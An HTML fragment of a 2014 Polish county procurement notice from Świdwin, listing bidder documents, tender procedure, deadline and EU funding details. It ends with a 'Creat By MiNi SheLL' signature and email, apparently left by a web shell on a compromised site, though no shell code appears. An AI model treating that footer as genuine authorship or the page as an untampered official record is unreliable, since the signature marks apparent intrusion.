<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatswidwinski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Świdwinie ul. Mieszka I 16 78-300 Świdwin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.10.2014 godzina 12:00, miejsce: Starostwo Powiatowe w Świdwinie ul. Mieszka I 16 78-300 Świdwin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki
Priorytet IX:  Rozwój wykształcenia i kompetencji w regionach
Działanie: 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com